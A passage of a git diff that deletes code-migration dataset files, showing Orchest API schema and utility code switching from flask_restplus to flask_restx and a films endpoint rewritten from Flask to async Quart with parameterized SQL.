fields.String( - required=True, - description="Status of the step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - "started_time": fields.String( - required=True, description="Time at which the step started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the step finished executing" - ), - }, -) - -pipeline_run = Model( - "Run", - { - "run_uuid": fields.String(required=True, description="UUID of run"), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of the run"), - "pipeline_steps": fields.List( # TODO: rename - fields.Nested(pipeline_run_pipeline_step), - description="Status of each pipeline step", - ), - }, -) - -interactive_run_config = pipeline_run_config.inherit("InteractiveRunConfig", {}) - -interactive_run_spec = pipeline_run_spec.inherit( - "InteractiveRunSpec", - { - "pipeline_definition": fields.Raw( - required=True, description="Pipeline definition in JSON" - ), - "run_config": fields.Nested( - interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - }, -) - -interactive_run = pipeline_run.inherit("InteractiveRun", {}) - -interactive_runs = Model( - "InteractiveRuns", - { - "runs": fields.List( - fields.Nested(interactive_run), - description='All ran interactive runs during this "lifecycle" of Orchest', - ) - }, -) - -status_update = Model( - "StatusUpdate", - { - "status": fields.String( - required=True, - description="New status of executable, e.g. pipeline or step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - }, -) - -# Namespace: Experiments. -non_interactive_run_config = pipeline_run_config.inherit( - "NonInteractiveRunConfig", - { - # Needed for the celery-worker to set the new project-dir for - # experiments. Note that the `orchest-webserver` has this value - # stored in the ENV variable `HOST_USER_DIR`. - "host_user_dir": fields.String( - required=True, description="Path to the /userdir on the host" - ), - }, -) - -non_interactive_run_spec = pipeline_run_spec.inherit( - "NonInteractiveRunSpec", - { - "run_config": fields.Nested( - non_interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - "scheduled_start": fields.String( # TODO: make DateTime - required=False, - # default=datetime.utcnow().isoformat(), - description="Time at which the run is scheduled to start", - ), - }, -) - -non_interactive_run = pipeline_run.inherit( - "NonInteractiveRun", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "pipeline_run_id": fields.Integer( - required=True, description="Respective run ID in experiment" - ), - }, -) - -experiment_spec = Model( - "ExperimentSpecification", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_definitions": fields.List( - fields.Raw(description="Pipeline definition in JSON"), - required=True, - description="Collection of pipeline definitions", - ), - "pipeline_run_ids": fields.List( - fields.Integer( - description=( - "Pipeline index corresponding to respective " - "list entries in pipeline_definitions." - ) - ), - required=True, - description="Collection of pipeline definition indices.", - ), - "pipeline_run_spec": fields.Nested( - non_interactive_run_spec, - required=True, - description='Specification of the pipeline runs, e.g. "full", "incoming" etc', - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - }, -) - -experiment = Model( - "Experiment", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "total_number_of_pipeline_runs": fields.Integer( - required=True, - description="Total number of pipeline runs part of the experiment", - ), - "pipeline_runs": fields.List( - fields.Nested(non_interactive_run), - description="Collection of pipeline runs part of the experiment", - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - "completed_pipeline_runs": fields.Integer( - required=True, - default=0, - description="Number of completed pipeline runs part of the experiment", - ), - }, -) - -experiments = Model( - "Experiments", - { - "experiments": fields.List( - fields.Nested(experiment), description="Collection of all experiments" - ), - }, -) - -environment_build = Model( - "EnvironmentBuild", - { - "build_uuid": fields.String( - required=True, description="UUID of the environment build" - ), - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - "requested_time": fields.String( - required=True, description="Time at which the build was requested" - ), - "started_time": fields.String( - required=True, description="Time at which the build started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the build finished executing" - ), - "status": fields.String( - required=True, - description="Status of the build", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED"], - ), - }, -) - -environment_builds = Model( - "EnvironmentBuilds", - { - "environment_builds": fields.List( - fields.Nested(environment_build), - description="Collection of environment_builds", - ), - }, -) - -environment_build_request = Model( - "EnvironmentBuildRequest", - { - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - }, -) - -environment_build_requests = Model( - "EnvironmentBuildRequests", - { - "environment_build_requests": fields.List( - fields.Nested(environment_build_request), - description="Collection of environment_build_request", - unique=True, - ), - }, -) - -validation_environments = Model( - "GateCheck", - { - "project_uuid": fields.String( - required=True, - description="The project UUID", - ), - "environment_uuids": fields.List( - fields.String(), - required=False, - description="UUIDs to check", - ), - }, -) - -validation_environments_result = Model( - "GateCheckResult", - { - "validation": fields.String( - required=True, - description="Whether the gate check passed or failed", - enum=["pass", "fail"], - ), - "fail": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that failed the validation", - ), - "actions": fields.List( - fields.String(enum=["WAIT", "BUILD", "RETRY"]), - required=True, - description="Action to convert environment 'fail' to 'pass'", - ), - "pass": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that passed the validation", - ), - }, -) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff deleted file mode 100644 index d8abb07..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/utils.py b/services/orchest-api/app/app/utils.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/utils.py - +++ b/services/orchest-api/app/app/utils.py -@@ -5,7 +5,7 @@ from typing import Dict, Set, Union - - import requests - from docker import errors --from flask_restplus import Model, Namespace -+from flask_restx import Model, Namespace - from sqlalchemy import and_ - - import app.models as models diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py deleted file mode 100644 index ac0c95d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py +++ /dev/null @@ -1,394 +0,0 @@ -import logging -import time -from datetime import datetime -from typing import Dict, Set, Union - -import requests -from docker import errors -from flask_restplus import Model, Namespace -from sqlalchemy import and_ - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import db, docker_client - - -def register_schema(api: Namespace) -> Namespace: - all_models = [ - getattr(schema, attr) - for attr in dir(schema) - if isinstance(getattr(schema, attr), Model) - ] - - # TODO: only a subset of all models should be registered. - for model in all_models: - api.add_model(model.name, model) - - return api - - -def shutdown_jupyter_server(url: str) -> bool: - """Shuts down the Jupyter server via an authenticated POST request. - - Sends an authenticated DELETE request to: - "url"/api/kernels/ - for every running kernel. And then shuts down the Jupyter server - itself via an authenticated POST request to: - "url"/api/shutdown - - Args: - connection_file: path to the connection_file that contains the - server information needed to connect to the Jupyter server. - url: the url at which the Jupyter server is running. - - Returns: - False if no Jupyter server is running. True otherwise. - """ - - logging.info("Shutting down Jupyter Server at url: %s" % url) - - # Shutdown the server, such that it also shuts down all related - # kernels. - # NOTE: Do not use /api/shutdown to gracefully shut down all kernels - # as it is non-blocking, causing container based kernels to persist! - r = requests.get(f"{url}api/kernels") - - kernels_json = r.json() - - # In case there are connection issue with the Gateway, then the - # "kernels_json" will be a dictionary: - # {'message': "Connection refused from Gateway server url, ...} - # Thus we first check whether we can indeed start shutting down - # kernels. - if isinstance(kernels_json, list): - for kernel in kernels_json: - requests.delete(f'{url}api/kernels/{kernel.get("id")}') - - # Now that all kernels all shut down, also shut down the Jupyter - # server itself. - r = requests.post(f"{url}api/shutdown") - - return True - - -def update_status_db( - status_update: Dict[str, str], model: Model, filter_by: Dict[str, str] -) -> None: - """Updates the status attribute of particular entry in the database. - - Args: - status_update: The new status {'status': 'STARTED'}. - model: Database model to update the status of. - filter_by: The filter to query the exact resource for which to - update its status. - - """ - data = status_update - - if data["status"] == "STARTED": - data["started_time"] = datetime.fromisoformat(data["started_time"]) - elif data["status"] in ["SUCCESS", "FAILURE"]: - data["finished_time"] = datetime.fromisoformat(data["finished_time"]) - - res = model.query.filter_by(**filter_by).update(data) - - if res: - db.session.commit() - - return - - -def get_environment_image_docker_id(name_or_id: str): - try: - return docker_client.images.get(name_or_id).id - except errors.ImageNotFound: - return None - - -def get_env_uuids_to_docker_id_mappings( - project_uuid: str, env_uuids: Set[str] -) -> Dict[str, str]: - """Map each environment uuid to its current image docker id. - - Args: - project_uuid: UUID of the project to which the environments - belong - env_uuids: Set of environment uuids. - - Returns: - Dict[env_uuid] = docker_id - - """ - env_uuid_docker_id_mappings = { - env_uuid: get_environment_image_docker_id( - _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - ) - for env_uuid in env_uuids - } - missing_images = [ - str(errors.ImageNotFound(f"{env_uuid} has no docker image")) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - if docker_id is None - ] - if len(missing_images) > 0: - raise errors.ImageNotFound("\n".join(missing_images)) - return env_uuid_docker_id_mappings - - -def lock_environment_images_for_run( - run_id: str, project_uuid: str, environment_uuids: Set[str] -) -> Dict[str, str]: - """Retrieve the docker ids to use for a pipeline run. - - Locks a set of environment images by making it so that they will - not be deleted by the attempt cleanup that follows an environment - build. - This is done by adding some entries to the db that will signal - the fact that the image will be used by a run, as long as the - run is PENDING or STARTED. - In order to avoid a race condition that happens between - reading the docker ids of the used environment and actually - writing to db, some logic needs to take place, such logic constitutes - the bulk of this function. - As a collateral effect, new entries for interactive or non - interactive image mappings will be added, which is at the same - time the mechanism through which we "lock" the images, or, protect - them from deletion as long as they are needed. - About the race condition: - between the read of the images docker ids and the commit - to the db of the mappings a new environment could have been - built, an image could have become nameless and be - subsequently removed because the image mappings were not - in the db yet, and we would end up with mappings that are - pointing to an image that does not exist. - If we would only check for the existence of the img we could - still be in a race condition, so we must act on the image - becoming nameless, not deleted. - - Args: - run_id: - project_uuid: - environment_uuids: - - Returns: - A dictionary mapping environment uuids to the docker id - of the image, so that the run steps can make use of those - images knowingly that the images won't be deleted, even - if they become outdated. - - """ - model = models.PipelineRunImageMapping - - # read the current docker image ids of each env - env_uuid_docker_id_mappings = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - - # write to the db the image_uuids and docker ids the run uses - # this is our first lock attempt - run_image_mappings = [ - model( - **{ - "run_uuid": run_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(run_image_mappings) - db.session.commit() - - # if the mappings have changed it means that at least 1 image - # that we are using has become nameless and it is outdated, and - # might be deleted if we did not lock in time, i.e. if we got - # on the base side of the race condition - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - while set(env_uuid_docker_id_mappings.values()) != set( - env_uuid_docker_id_mappings2.values() - ): - # get which environment images have been updated - # between the moment we read the docker id and the - # commit to db, this is a lock attempt - mappings_to_update = set(env_uuid_docker_id_mappings2.items()) - set( - env_uuid_docker_id_mappings.items() - ) - for env_uuid, docker_id in mappings_to_update: - model.query.filter( - # same task - model.run_uuid == run_id, - # same environment - model.orchest_environment_uuid == env_uuid - # update docker id to which the run will point to - ).update({"docker_img_id": docker_id}) - db.session.commit() - - env_uuid_docker_id_mappings = env_uuid_docker_id_mappings2 - - # the next time we check for equality, - # if they are equal that means that we know that we are - # pointing to images that won't be deleted because the - # run is already in the db as PENDING - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - return env_uuid_docker_id_mappings - - -def interactive_runs_using_environment(project_uuid: str, env_uuid: str): - """Get the list of interactive runs using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.InteractivePipelineRun.query.filter( - models.InteractivePipelineRun.project_uuid == project_uuid, - models.InteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.InteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - - -def experiments_using_environment(project_uuid: str, env_uuid: str): - """Get the list of experiments using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.Experiment.query.filter( - # exp related to this project - models.Experiment.project_uuid == project_uuid, - # keep project for which at least a run uses the environment - # and is or will make use of the environment (PENDING/STARTED) - models.Experiment.pipeline_runs.any( - and_( - models.NonInteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.NonInteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ) - ), - ).all() - - -def is_environment_in_use(project_uuid: str, env_uuid: str) -> bool: - """True if the environment is or will be in use by a run/experiment - - Args: - env_uuid: - - Returns: - bool: - """ - - int_runs = interactive_runs_using_environment(project_uuid, env_uuid) - exps = experiments_using_environment(project_uuid, env_uuid) - return len(int_runs) > 0 or len(exps) > 0 - - -def is_docker_image_in_use(img_id: str) -> bool: - """True if the image is or will be in use by a run/experiment - - Args: - img_id: - - Returns: - bool: - """ - - runs = models.PipelineRun.query.filter( - models.PipelineRun.image_mappings.any(docker_img_id=img_id), - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - return bool(runs) - - -def remove_if_dangling(img) -> bool: - """Remove an image if its dangling. - - A dangling image is an image that is nameless and tag-less, - and for which no runs exist that are PENDING or STARTED and that - are going to use this image in one of their steps. - - Args: - img: - - Returns: - True if the image was successfully removed. - False if not, e.g. if it is not nameless or if it is being used - or will be used by a run. - - """ - # nameless image - if len(img.attrs["RepoTags"]) == 0 and not is_docker_image_in_use(img.id): - # need to check multiple times because of a race condition - # given by the fact that cleaning up a project will - # stop runs and experiments, then cleanup images and dangling - # images, it might be that the celery worker running the task - # still has to shut down the containers - tries = 10 - while tries > 0: - try: - docker_client.images.remove(img.id) - return True - except errors.ImageNotFound: - return False - except Exception as e: - logging.warning(f"exception during removal of image {img.id}:\n{e}") - pass - time.sleep(1) - tries -= 1 - return False - - -def parse_string_memory_size(memory_size: Union[str, int]) -> int: - """Simply converts string description of memory size to number of bytes - - Allowable inputs are: [\d]+\s*(KB|MB|GB)+ - """ - - # seems like this is already int (assumed to be number of bytes) - if isinstance(memory_size, int): - return memory_size - - conversion = {"KB": 1000, "MB": 1000 ** 2, "GB": 1000 ** 3} - size, unit = memory_size[:-2], memory_size[-2:] - size = int(float(size) * conversion[unit]) - - return size - - -def calculate_shm_size(data_passing_memory_size: int) -> int: - """Calculates the shm-size for the Docker container. - - Given a size for the memory-server we need to do a certain - allocation to get to that size. In other words, the `shm-size` for - the Docker container is not equal to the request size for the - memory-server. - - If the Plasma server tries to allocate more than is available in /dev/shm it - will not fail but issue a warning. However, the full amount requested will - not be available to the user. - - Args: - data_passing_memory_size: Requested size for the memory-server. - - Returns: - The shm-size for the Docker container. - - """ - # We need to overallocate by a fraction to make /dev/shm large enough for the - # request amount in `data_passing_memory_size` - return int(data_passing_memory_size * 1.2) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py deleted file mode 100644 index d6bf9f1..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py +++ /dev/null @@ -1,394 +0,0 @@ -import logging -import time -from datetime import datetime -from typing import Dict, Set, Union - -import requests -from docker import errors -from flask_restx import Model, Namespace -from sqlalchemy import and_ - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import db, docker_client - - -def register_schema(api: Namespace) -> Namespace: - all_models = [ - getattr(schema, attr) - for attr in dir(schema) - if isinstance(getattr(schema, attr), Model) - ] - - # TODO: only a subset of all models should be registered. - for model in all_models: - api.add_model(model.name, model) - - return api - - -def shutdown_jupyter_server(url: str) -> bool: - """Shuts down the Jupyter server via an authenticated POST request. - - Sends an authenticated DELETE request to: - "url"/api/kernels/ - for every running kernel. And then shuts down the Jupyter server - itself via an authenticated POST request to: - "url"/api/shutdown - - Args: - connection_file: path to the connection_file that contains the - server information needed to connect to the Jupyter server. - url: the url at which the Jupyter server is running. - - Returns: - False if no Jupyter server is running. True otherwise. - """ - - logging.info("Shutting down Jupyter Server at url: %s" % url) - - # Shutdown the server, such that it also shuts down all related - # kernels. - # NOTE: Do not use /api/shutdown to gracefully shut down all kernels - # as it is non-blocking, causing container based kernels to persist! - r = requests.get(f"{url}api/kernels") - - kernels_json = r.json() - - # In case there are connection issue with the Gateway, then the - # "kernels_json" will be a dictionary: - # {'message': "Connection refused from Gateway server url, ...} - # Thus we first check whether we can indeed start shutting down - # kernels. - if isinstance(kernels_json, list): - for kernel in kernels_json: - requests.delete(f'{url}api/kernels/{kernel.get("id")}') - - # Now that all kernels all shut down, also shut down the Jupyter - # server itself. - r = requests.post(f"{url}api/shutdown") - - return True - - -def update_status_db( - status_update: Dict[str, str], model: Model, filter_by: Dict[str, str] -) -> None: - """Updates the status attribute of particular entry in the database. - - Args: - status_update: The new status {'status': 'STARTED'}. - model: Database model to update the status of. - filter_by: The filter to query the exact resource for which to - update its status. - - """ - data = status_update - - if data["status"] == "STARTED": - data["started_time"] = datetime.fromisoformat(data["started_time"]) - elif data["status"] in ["SUCCESS", "FAILURE"]: - data["finished_time"] = datetime.fromisoformat(data["finished_time"]) - - res = model.query.filter_by(**filter_by).update(data) - - if res: - db.session.commit() - - return - - -def get_environment_image_docker_id(name_or_id: str): - try: - return docker_client.images.get(name_or_id).id - except errors.ImageNotFound: - return None - - -def get_env_uuids_to_docker_id_mappings( - project_uuid: str, env_uuids: Set[str] -) -> Dict[str, str]: - """Map each environment uuid to its current image docker id. - - Args: - project_uuid: UUID of the project to which the environments - belong - env_uuids: Set of environment uuids. - - Returns: - Dict[env_uuid] = docker_id - - """ - env_uuid_docker_id_mappings = { - env_uuid: get_environment_image_docker_id( - _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - ) - for env_uuid in env_uuids - } - missing_images = [ - str(errors.ImageNotFound(f"{env_uuid} has no docker image")) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - if docker_id is None - ] - if len(missing_images) > 0: - raise errors.ImageNotFound("\n".join(missing_images)) - return env_uuid_docker_id_mappings - - -def lock_environment_images_for_run( - run_id: str, project_uuid: str, environment_uuids: Set[str] -) -> Dict[str, str]: - """Retrieve the docker ids to use for a pipeline run. - - Locks a set of environment images by making it so that they will - not be deleted by the attempt cleanup that follows an environment - build. - This is done by adding some entries to the db that will signal - the fact that the image will be used by a run, as long as the - run is PENDING or STARTED. - In order to avoid a race condition that happens between - reading the docker ids of the used environment and actually - writing to db, some logic needs to take place, such logic constitutes - the bulk of this function. - As a collateral effect, new entries for interactive or non - interactive image mappings will be added, which is at the same - time the mechanism through which we "lock" the images, or, protect - them from deletion as long as they are needed. - About the race condition: - between the read of the images docker ids and the commit - to the db of the mappings a new environment could have been - built, an image could have become nameless and be - subsequently removed because the image mappings were not - in the db yet, and we would end up with mappings that are - pointing to an image that does not exist. - If we would only check for the existence of the img we could - still be in a race condition, so we must act on the image - becoming nameless, not deleted. - - Args: - run_id: - project_uuid: - environment_uuids: - - Returns: - A dictionary mapping environment uuids to the docker id - of the image, so that the run steps can make use of those - images knowingly that the images won't be deleted, even - if they become outdated. - - """ - model = models.PipelineRunImageMapping - - # read the current docker image ids of each env - env_uuid_docker_id_mappings = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - - # write to the db the image_uuids and docker ids the run uses - # this is our first lock attempt - run_image_mappings = [ - model( - **{ - "run_uuid": run_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(run_image_mappings) - db.session.commit() - - # if the mappings have changed it means that at least 1 image - # that we are using has become nameless and it is outdated, and - # might be deleted if we did not lock in time, i.e. if we got - # on the base side of the race condition - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - while set(env_uuid_docker_id_mappings.values()) != set( - env_uuid_docker_id_mappings2.values() - ): - # get which environment images have been updated - # between the moment we read the docker id and the - # commit to db, this is a lock attempt - mappings_to_update = set(env_uuid_docker_id_mappings2.items()) - set( - env_uuid_docker_id_mappings.items() - ) - for env_uuid, docker_id in mappings_to_update: - model.query.filter( - # same task - model.run_uuid == run_id, - # same environment - model.orchest_environment_uuid == env_uuid - # update docker id to which the run will point to - ).update({"docker_img_id": docker_id}) - db.session.commit() - - env_uuid_docker_id_mappings = env_uuid_docker_id_mappings2 - - # the next time we check for equality, - # if they are equal that means that we know that we are - # pointing to images that won't be deleted because the - # run is already in the db as PENDING - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - return env_uuid_docker_id_mappings - - -def interactive_runs_using_environment(project_uuid: str, env_uuid: str): - """Get the list of interactive runs using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.InteractivePipelineRun.query.filter( - models.InteractivePipelineRun.project_uuid == project_uuid, - models.InteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.InteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - - -def experiments_using_environment(project_uuid: str, env_uuid: str): - """Get the list of experiments using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.Experiment.query.filter( - # exp related to this project - models.Experiment.project_uuid == project_uuid, - # keep project for which at least a run uses the environment - # and is or will make use of the environment (PENDING/STARTED) - models.Experiment.pipeline_runs.any( - and_( - models.NonInteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.NonInteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ) - ), - ).all() - - -def is_environment_in_use(project_uuid: str, env_uuid: str) -> bool: - """True if the environment is or will be in use by a run/experiment - - Args: - env_uuid: - - Returns: - bool: - """ - - int_runs = interactive_runs_using_environment(project_uuid, env_uuid) - exps = experiments_using_environment(project_uuid, env_uuid) - return len(int_runs) > 0 or len(exps) > 0 - - -def is_docker_image_in_use(img_id: str) -> bool: - """True if the image is or will be in use by a run/experiment - - Args: - img_id: - - Returns: - bool: - """ - - runs = models.PipelineRun.query.filter( - models.PipelineRun.image_mappings.any(docker_img_id=img_id), - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - return bool(runs) - - -def remove_if_dangling(img) -> bool: - """Remove an image if its dangling. - - A dangling image is an image that is nameless and tag-less, - and for which no runs exist that are PENDING or STARTED and that - are going to use this image in one of their steps. - - Args: - img: - - Returns: - True if the image was successfully removed. - False if not, e.g. if it is not nameless or if it is being used - or will be used by a run. - - """ - # nameless image - if len(img.attrs["RepoTags"]) == 0 and not is_docker_image_in_use(img.id): - # need to check multiple times because of a race condition - # given by the fact that cleaning up a project will - # stop runs and experiments, then cleanup images and dangling - # images, it might be that the celery worker running the task - # still has to shut down the containers - tries = 10 - while tries > 0: - try: - docker_client.images.remove(img.id) - return True - except errors.ImageNotFound: - return False - except Exception as e: - logging.warning(f"exception during removal of image {img.id}:\n{e}") - pass - time.sleep(1) - tries -= 1 - return False - - -def parse_string_memory_size(memory_size: Union[str, int]) -> int: - """Simply converts string description of memory size to number of bytes - - Allowable inputs are: [\d]+\s*(KB|MB|GB)+ - """ - - # seems like this is already int (assumed to be number of bytes) - if isinstance(memory_size, int): - return memory_size - - conversion = {"KB": 1000, "MB": 1000 ** 2, "GB": 1000 ** 3} - size, unit = memory_size[:-2], memory_size[-2:] - size = int(float(size) * conversion[unit]) - - return size - - -def calculate_shm_size(data_passing_memory_size: int) -> int: - """Calculates the shm-size for the Docker container. - - Given a size for the memory-server we need to do a certain - allocation to get to that size. In other words, the `shm-size` for - the Docker container is not equal to the request size for the - memory-server. - - If the Plasma server tries to allocate more than is available in /dev/shm it - will not fail but issue a warning. However, the full amount requested will - not be available to the user. - - Args: - data_passing_memory_size: Requested size for the memory-server. - - Returns: - The shm-size for the Docker container. - - """ - # We need to overallocate by a fraction to make /dev/shm large enough for the - # request amount in `data_passing_memory_size` - return int(data_passing_memory_size * 1.2) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff deleted file mode 100644 index 82800ff..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.diff +++ /dev/null @@ -1,57 +0,0 @@ -diff --git a/app/films.py b/app/films.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/films.py - +++ b/app/films.py -@@ -1,21 +1,20 @@ --from flask import abort, Blueprint, current_app, jsonify, request -+from quart import abort, Blueprint, current_app, jsonify, request - - blueprint = Blueprint('films', __name__) - - - @blueprint.route('/films/') --def get_films(): -+async def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -+ async with current_app.pool.acquire() as connection: -+ async with connection.transaction(): -+ async for film in connection.cursor( - """SELECT film_id, release_year, title - FROM film -- WHERE release_year > %s""", -- (minimal_year,), -- ) -- for film in cursor: -+ WHERE release_year > $1""", -+ minimal_year, -+ ): - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], -@@ -24,16 +23,15 @@ def get_films(): - - - @blueprint.route('/films//') --def get_film(id): -- with current_app.pool.acquire() as connection: -- with connection.cursor() as cursor: -- cursor.execute( -+async def get_film(id): -+ async with current_app.pool.acquire() as connection: -+ async with connection.transaction(): -+ result = await connection.fetchrow( - """SELECT film_id, release_year, title - FROM film -- WHERE film_id = %s""", -- (id,), -+ WHERE film_id = $1""", -+ id, - ) -- result = cursor.fetchone() - if result is not None: - return jsonify({ - 'film_id': result['film_id'], diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py deleted file mode 100644 index 0b896fe..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.source.py +++ /dev/null @@ -1,44 +0,0 @@ -from flask import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('films', __name__) - - -@blueprint.route('/films/') -def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """SELECT film_id, release_year, title - FROM film - WHERE release_year > %s""", - (minimal_year,), - ) - for film in cursor: - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], - } - return jsonify(films) - - -@blueprint.route('/films//') -def get_film(id): - with current_app.pool.acquire() as connection: - with connection.cursor() as cursor: - cursor.execute( - """SELECT film_id, release_year, title - FROM film - WHERE film_id = %s""", - (id,), - ) - result = cursor.fetchone() - if result is not None: - return jsonify({ - 'film_id': result['film_id'], - 'release_year': result['release_year'], - 'title': result['title'], - }) - else: - abort(404) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py deleted file mode 100644 index 198d4c8..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$films.py.target.py +++ /dev/null @@ -1,42 +0,0 @@ -from quart import abort, Blueprint, current_app, jsonify, request - -blueprint = Blueprint('films', __name__) - - -@blueprint.route('/films/') -async def get_films(): - minimal_year = request.args.get('year.gt', 2000) - films = {} - async with current_app.pool.acquire() as connection: - async with connection.transaction(): - async for film in connection.cursor( - """SELECT film_id, release_year, title - FROM film - WHERE release_year > $1""", - minimal_year, - ): - films[film['film_id']] = { - 'release_year': film['release_year'], - 'title': film['title'], - } - return jsonify(films) - - -@blueprint.route('/films//') -async def get_film(id): - async with current_app.pool.acquire() as connection: - async with connection.transaction(): - result = await connection.fetchrow( - """SELECT film_id, release_year, title - FROM film - WHERE film_id = $1""", - id, - ) - if result is not None: - return jsonify({ - 'film_id': result['film_id'], - 'release_year': result['release_year'], - 'title': result['title'], - }) - else: - abort(404) diff --git a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff b/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff deleted file mode 100644 index d0b4aa4..0000000 --- a/v1/data/codefile/pgjones@faster_than_flask_article__0a70f2b__app$reviews.py.diff +++ /dev/null @@ -1,34 +0,0 @@ -diff --git a/app/reviews.py b/app/reviews.py - index 253538aa8cd65a3ed48563c2ea4594d998286293..0a70f2bddae90da13da5bce2b77ea56355ecc5d1 100644 - --- a/app/reviews.py - +++ b/app/reviews.py -@@ -1,20 +1,19 @@ --from flask import abort, Blueprint, current_app, jsonify, request -+from quart import abort, Blueprint, current_app, jsonify, request - - blueprint = Blueprint('reviews', __name__) - - - 